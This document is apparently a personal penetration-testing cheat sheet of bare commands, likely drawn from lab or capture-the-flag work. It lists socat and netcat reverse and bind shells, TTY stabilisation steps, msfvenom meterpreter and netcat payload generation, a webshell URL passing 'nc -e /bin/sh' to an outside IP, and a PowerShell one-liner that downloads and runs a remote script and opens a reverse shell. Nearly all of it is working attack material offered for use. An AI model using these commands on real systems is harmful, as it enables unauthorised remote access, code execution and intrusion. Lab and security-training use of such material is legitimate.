# updog
pip3 install updog
updog -d /tmp -p 1234
php -S localhost:9000 -t PATH

# python
V> python -c 'import pty;pty.spawn("/bin/bash")'
V> Ctrl + Z 
A> stty raw -echo; fg

V> reset
V> export SHELL=bash
V> export TERM=xterm-256color
V> stty rows <num> columns <cols>

# rlwrap
rlwrap nc -lvnp <port>

# TTY
script /dev/null -c bash
mkfifo input; tail -f input | /bin/bash > output

# socat
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

# Reverse Shells 
Invoke-WebRequest -uri <LOCAL-IP>/socat.exe -outfile C:\\Windows\temp\socat.exe

socat TCP-L:<port> -
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes # windows
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li" # linux

# Bind Shells
socat TCP-L:<PORT> EXEC:"bash -li"
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
socat TCP:<TARGET-IP>:<TARGET-PORT> -
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

# listeners
mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

# msfvenom
msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443
msfvenom -p cmd/unix/reverse_netcat LHOST=10.11.41.181 LPORT=8888 R

# webshell
http://admin.holo.live/dashboard.php?cmd=nc+-e+/bin/sh+10.50.155.7+4444

# nishang rev-shell
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.41.181:8000/shell.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.41.181 -Port 4444
